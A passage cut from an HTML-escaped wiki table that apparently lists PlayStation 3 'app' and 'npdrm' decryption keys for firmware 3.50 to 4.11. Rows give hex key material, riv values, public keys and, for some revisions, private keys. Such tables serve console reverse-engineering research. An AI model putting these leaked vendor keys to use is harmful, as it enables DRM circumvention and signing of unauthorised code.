style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x09 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;F69E4A2934F114D89F386CE766388366CDD210F1D8913E3B973257F1201D632B&lt;/code&gt; || &lt;code&gt;F4D535069301EE888CC2A852DB654461&lt;/code&gt; || &lt;code&gt;1D7B974D10E61C2ED087A0981535904677EC07E96260F89565FF7EBDA4EE035C2AA9BCBDD5893F99&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50&lt;/span&gt; || 0x08 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;8E944267C02E69A4FE474B7F5FCD7974A4F936FF4355AEC4F80EFA123858D8F6&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;908A75754E521EAC2F5A4889C6D7B72D&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;91201DA7D79E8EE2563142ECBD646DA026C963AC09E760E5390FFE24DAE6864310ABE147F8204D0B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x13&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.50 || 0x07 np || 3.50++ || dec || &lt;code&gt;3946DFAA141718C7BE339A0D6C26301C76B568AEBC5CD52652F2E2E0297437C3&lt;/code&gt; || &lt;code&gt;E4897BE553AE025CDCBF2B15D1C9234E&lt;/code&gt; || &lt;code&gt;A13AFE8B63F897DA2D3DC3987B39389DC10BAD99DFB703838C4A0BC4E8BB44659C726CFD0CE60D0E&lt;/code&gt; || &lt;code&gt;009EF86907782A318D4CC3617EBACE2480E73A46F6&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | npdrm || 3.50 || 0x09 np || 3.50++ || dec || &lt;code&gt;0786F4B0CA5937F515BDCE188F569B2EF3109A4DA0780A7AA07BD89C3350810A&lt;/code&gt; || &lt;code&gt;04AD3C2F122A3B35E804850CAD142C6D&lt;/code&gt; || &lt;code&gt;A1FE61035DBBEA5A94D120D03C000D3B2F084B9F4AFA99A2D4A588DF92B8F36327CE9E47889A45D0&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55 || 0x0A || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55+ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;29805302E7C92F204009161CA93F776A072141A8C46A108E571C46D473A176A3&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;5D1FAB844107676ABCDFC25EAEBCB633&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;09301B6436C85B53CB1585300A3F1AF9FB14DB7C30088C4642AD66D5C148B8995BB1A698A8C71827&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0010818ED8A666051C6198662C3D6DDE2CA4901DDC&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0B || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;A4C97402CC8A71BC7748661FE9CE7DF44DCE95D0D58938A59F47B9E9DBA7BFC3&lt;/code&gt; || &lt;code&gt;E4792F2B9DB30CB8D1596077A13FB3B5&lt;/code&gt; || &lt;code&gt;2733C889D289550FE00EAA5A47A34CEF0C1AF187610EB07BA35D2C09BB73C80B244EB4147700D1BF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0C || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;9814EFFF67B7074D1B263BF85BDC8576CE9DEC914123971B169472A1BC2387FA&lt;/code&gt; || &lt;code&gt;D43B1FA8BE15714B3078C23908BB2BCA&lt;/code&gt; || &lt;code&gt;7D1986C6BEE6CE1E0C5893BD2DF203881F40D5056761CC3F1F2E9D9A378617A2DE40BA5F09844CEB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55&lt;/span&gt; || 0x0B np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BB31DF9A6F62C0DF853075FAA65134D9CE2240306C1731D1F7DA9B5329BD699F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;263057225873F83940A65C8C926AC3E4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BC3A82A4F44C43A197070CD236FDC94FCC542D69A3E803E0AFF78D1F3DA19A79D2F61FAB5B94B437&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.55 || 0x0A np || 3.55++ || dec || &lt;code&gt;03C21AD78FBB6A3D425E9AAB1298F9FD70E29FD4E6E3A3C151205DA50C413DE4&lt;/code&gt; || &lt;code&gt;0A99D4D4F8301A88052D714AD2FB565E&lt;/code&gt; || &lt;code&gt;3995C390C9F7FBBAB124A1C14E70F9741A5E6BDF17A605D88239652C8EA7D5FC9F24B30546C1E44B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | npdrm || 3.55-? || 0x0C np || 3.55++ || dec || &lt;code&gt;357EBBEA265FAEC271182D571C6CD2F62CFA04D325588F213DB6B2E0ED166D92&lt;/code&gt; || &lt;code&gt;D26E6DD2B74CD78E866E742E5571B84F&lt;/code&gt; || &lt;code&gt;00DCF5391618604AB42C8CFF3DC304DF45341EBA4551293E9E2B68FFE2DF527FFA3BE8329E015E57&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0D || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;03B4C421E0C0DE708C0F0B71C24E3EE04306AE7383D8C5621394CCB99FF7A194&lt;/code&gt; || &lt;code&gt;5ADB9EAFE897B54CB1060D6885BE22CF&lt;/code&gt; || &lt;code&gt;71502ADB5783583AB88B2D5F23F419AF01C8B1E72FCA1E694AD49FE3266F1F9C61EFC6F29B351142&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0E || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;39A870173C226EB8A3EEE9CA6FB675E82039B2D0CCB22653BFCE4DB013BAEA03&lt;/code&gt; || &lt;code&gt;90266C98CBAA06C1BF145FF760EA1B45&lt;/code&gt; || &lt;code&gt;84DE5692809848E5ACBE25BE548F6981E3DB14735A5DDE1A0FD1F475866532B862B1AB6A004B7255&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-? || 0x0F || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;FD52DFA7C6EEF5679628D12E267AA863B9365E6DB95470949CFD235B3FCA0F3B&lt;/code&gt; || &lt;code&gt;64F50296CF8CF49CD7C643572887DA0B&lt;/code&gt; || &lt;code&gt;0696D6CCBD7CF585EF5E00D547503C185D7421581BAD196E081723CD0A97FA40B2C0CD2492B0B5A1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56&lt;/span&gt; || 0x0E np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;71AA75C70A255580E4AE9BDAA0B08828C53EAA713CD0713797F143B284C1589B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;9DED878CB6BA07121C0F50E7B172A8BF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;387FCDAEAFF1B59CFAF79CE6215A065ACEAFFAF4048A4F217E1FF5CE67C66EC3F089DB235E52F9D3&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0D np || 3.56++ || dec || &lt;code&gt;337A51416105B56E40D7CAF1B954CDAF4E7645F28379904F35F27E81CA7B6957&lt;/code&gt; || &lt;code&gt;8405C88E042280DBD794EC7E22B74002&lt;/code&gt; || &lt;code&gt;9BFF1CC7118D2393DE50D5CF44909860683411A532767BFDAC78622DB9E5456753FE422CBAFA1DA1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0F np || 3.56++ || dec || &lt;code&gt;135C098CBE6A3E037EBE9F2BB9B30218DDE8D68217346F9AD33203352FBB3291&lt;/code&gt; || &lt;code&gt;4070C898C2EAAD1634A288AA547A35A8&lt;/code&gt; || &lt;code&gt;BBD7CCCB556C2EF0F908DC7810FAFC37F2E56B3DAA5F7FAF53A4944AA9B841F76AB091E16B231433&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x10 || 3.60++ || dec || &lt;code&gt;A5E51AD8F32FFBDE808972ACEE46397F2D3FE6BC823C8218EF875EE3A9B0584F&lt;/code&gt; || &lt;code&gt;7A203D5112F799979DF0E1B8B5B52AA4&lt;/code&gt; || &lt;code&gt;50597B7F680DD89F6594D9BDC0CBEE03666AB53647D0487F7F452FE2DD02694631EA755548C9E934&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x10 np || 3.60++ || dec || &lt;code&gt;4B3CD10F6A6AA7D99F9B3A660C35ADE08EF01C2C336B9E46D1BB5678B4261A61&lt;/code&gt; || &lt;code&gt;C0F2AB86E6E0457552DB50D7219371C5&lt;/code&gt; || &lt;code&gt;64A5C60BC2AD18B8A237E4AA690647E12BF7A081523FAD4F29BE89ACAC72F7AB43C74EC9AFFDA213&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x11 || 3.60++ || dec || &lt;code&gt;0F8EAB8884A51D092D7250597388E3B8B75444AC138B9D36E5C7C5B8C3DF18FD&lt;/code&gt; || &lt;code&gt;97AF39C383E7EF1C98FA447C597EA8FE&lt;/code&gt; || &lt;code&gt;2FDA7A56AAEA65921C0284FF1942C6DE137370093D106034B59191951A5201B422D462F8726F852D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.60-3.61&lt;/span&gt; || 0x11 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.60&amp;nbsp;&amp;lt;=3.61&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F5D1DBC182F5083CD4EA37C431C7DAC73882C07F232D2699B1DD9FDDF1BF4195&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D3A7C3C91CBA014FCBCA6D5570DE13FF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;97CA8A9781F45E557E98F176EF794FCDA6B151EB3DFD1ABA12151E00AE59957C3B15628FC8875D28&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x12 || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D127E0F7F31F2546D374E46F26A45F14016308EDB409185187AB7F0B2DEE6715&lt;/code&gt; || &lt;code&gt;25589F01B97B9BE1E07447A3CE7F06B9&lt;/code&gt; || &lt;code&gt;3C266FF46D1F526405CCCDD67EE9C7D5693B4A072C06988CAD22ADDB64439A32E2337722F51FC15B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x12 np || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D2F32F6E1D7A96131FAECE657008B57AAC14A9475CEF983A55E6C82CF1FCC374&lt;/code&gt; || &lt;code&gt;211B52440AB7066A53121106FEB29FD5&lt;/code&gt; || &lt;code&gt;EA2F8826D1ECA47B029B41C833615006FAF535AAD30594319EA4F767925EBAE3A3EEE32E6D29580C&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x13 np || 3.65++ || dec || &lt;code&gt;265C93CF48562EC5D18773BEB7689B8AD10C5EB6D21421455DEBC4FB128CBF46&lt;/code&gt; || &lt;code&gt;8DEA5FF959682A9B98B688CEA1EF4A1D&lt;/code&gt; || &lt;code&gt;9D8DB5A880608DC69717991AFC3AD5C0215A5EE413328C2ABC8F35589E04432373DB2E2339EEF7C8&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x13 || 3.65++ || dec || &lt;code&gt;DBF62D76FC81C8AC92372A9D631DDC9219F152C59C4B20BFF8F96B64AB065E94&lt;/code&gt; || &lt;code&gt;CB5DD4BE8CF115FFB25801BC6086E729&lt;/code&gt; || &lt;code&gt;B26FE6D3E3A1E766FAE79A8E6A7F48998E7FC1E4B0AD8745FF54C018C2A6CC7A0DD7525FAFEA4917&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x14 || 3.65++ || dec || &lt;code&gt;491B0D72BB21ED115950379F4564CE784A4BFAABB00E8CB71294B192B7B9F88E&lt;/code&gt; || &lt;code&gt;F98843588FED8B0E62D7DDCB6F0CECF4&lt;/code&gt; || &lt;code&gt;04275E8838EF95BD013B223C3DF674540932F21B534C7ED2944B9104D938FEB03B824DDB866AB26E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.65-3.66&lt;/span&gt; || 0x14 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.65&amp;nbsp;&amp;lt;=3.66&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF10F09590C0152F7EF749FF4B990122A4E8E5491DA49A2D931E72EEB990F860&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;22C19C5522F7A782AFC547C2640F5BDE&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;3233BA2B284189FB1687DF653002257A0925D8EB0C64EBBE8CC7DE87F548D107DE1FD3D1D285DB4F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x15 || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;324D2BFEDA4044604EDCA550EB7F56065C4CA91DFB2636EC78030353DC1CEFF4&lt;/code&gt; || &lt;code&gt;A37B2139FBCF62F6B41F796A594440C8&lt;/code&gt; || &lt;code&gt;A6283C12B04C37DDC6EBBF4B31E5F1B1B2602DC83EBA6362C9C1189BF25A3EF1BB3766625A4E9694&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x15 np || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;3DED5C82E18CD9F695855B1757CA91447EA34D906A66BEAAB46113F9BCE1D92F&lt;/code&gt; || &lt;code&gt;ABF2DA36D993554FB060322DC51097F7&lt;/code&gt; || &lt;code&gt;497296C62F2C489F9F0E7628887AD54715EFD1227B053C6AA4501D43FF6FB536B78315C08D786569&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x16 || 3.70++ || dec || &lt;code&gt;A106692224F1E91E1C4EBAD4A25FBFF66B4B13E88D878E8CD072F23CD1C5BF7C&lt;/code&gt; || &lt;code&gt;62773C70BD749269C0AFD1F12E73909E&lt;/code&gt; || &lt;code&gt;566635D3E1DCEC47243AAD1628AE6B2CEB33463FC155E4635846CE33899C5E353DDFA47FEF5694AF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x16 np || 3.70++ || dec || &lt;code&gt;7910340483E419E55F0D33E4EA5410EEEC3AF47814667ECA2AA9D75602B14D4B&lt;/code&gt; || &lt;code&gt;4AD981431B98DFD39B6388EDAD742A8E&lt;/code&gt; || &lt;code&gt;62DFE488E410B1B6B2F559E4CB932BCB78845AB623CC59FDF65168400FD76FA82ED1DC60E091D1D1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x17 || 3.70++ || dec || &lt;code&gt;4E104DCE09BA878C75DA98D0B1636F0E5F058328D81419E2A3D22AB0256FDF46&lt;/code&gt; || &lt;code&gt;954A86C4629E116532304A740862EF85&lt;/code&gt; || &lt;code&gt;3B7B04C71CAE2B1199D57453C038BB1B541A05AD1B94167B0AB47A9B24CAECB9000CB21407009666&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.70-3.74&lt;/span&gt; || 0x17 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.70&amp;nbsp;&amp;lt;=3.74&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F11DBD2C97B32AD37E55F8E743BC821D3E67630A6784D9A058DDD26313482F0F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;FC5FA12CA3D2D336C4B8B425D679DA55&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;19E27EE90E33EDAB16B22E688B5F704E5C6EC1062070EBF43554CD03DFDAE16D684BB8B5574DBECA&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x15&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x18 || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1F876AB252DDBCB70E74DC4A20CD8ED51E330E62490E652F862877E8D8D0F997&lt;/code&gt; || &lt;code&gt;BF8D6B1887FA88E6D85C2EDB2FBEC147&lt;/code&gt; || &lt;code&gt;64A04126D77BF6B4D686F6E8F87DD150A5B014BA922D2B694FFF4453E11239A6E0B58F1703C51494&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x18 np || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1A4B32C927257811F777997EA9549CEFD2AE829A528F771A3EE7FEB2110E0133&lt;/code&gt; || &lt;code&gt;402666C76D795D228089810DDC128D14&lt;/code&gt; || &lt;code&gt;ABD149AB27BEE0DEC0E34BB8A8CA225E3FCF504E2DDE6A55BBD39A06CFB068CFC3CF5DF8B117EB5A&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x19 || 4.00++ || dec || &lt;code&gt;3236B9937174DF1DC12EC2DD8A318A0EA4D3ECDEA5DFB4AC1B8278447000C297&lt;/code&gt; || &lt;code&gt;6153DEE781B8ADDC6A439498B816DC46&lt;/code&gt; || &lt;code&gt;148DCA961E2738BAF84B2D1B6E2DA2ABD6A95F2C9571E54C6922F9ED9674F062B7F1BE5BD6FA5268&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x19 np || 4.00++ || dec || &lt;code&gt;FBDA75963FE690CFF35B7AA7B408CF631744EDEF5F7931A04D58FD6A921FFDB3&lt;/code&gt; || &lt;code&gt;F72C1D80FFDA2E3BF085F4133E6D2805&lt;/code&gt; || &lt;code&gt;637EAD34E7B85C723C627E68ABDD0419914EBED4008311731DD87FDDA2DAF71F856A70E14DA17B42&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x24&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1A || 4.00++ || dec || &lt;code&gt;5EFD1E9961462794E3B9EF2A4D0C1F46F642AAE053B5025504130590E66F19C9&lt;/code&gt; || &lt;code&gt;1AC8FA3B3C90F8FDE639515F91B58327&lt;/code&gt; || &lt;code&gt;BE4B1B513536960618BFEF12A713F6673881B02F9DC616191E823FC8337CCF99ADAA6172019C0C23&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.00-4.11&lt;/span&gt; || 0x1A np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span 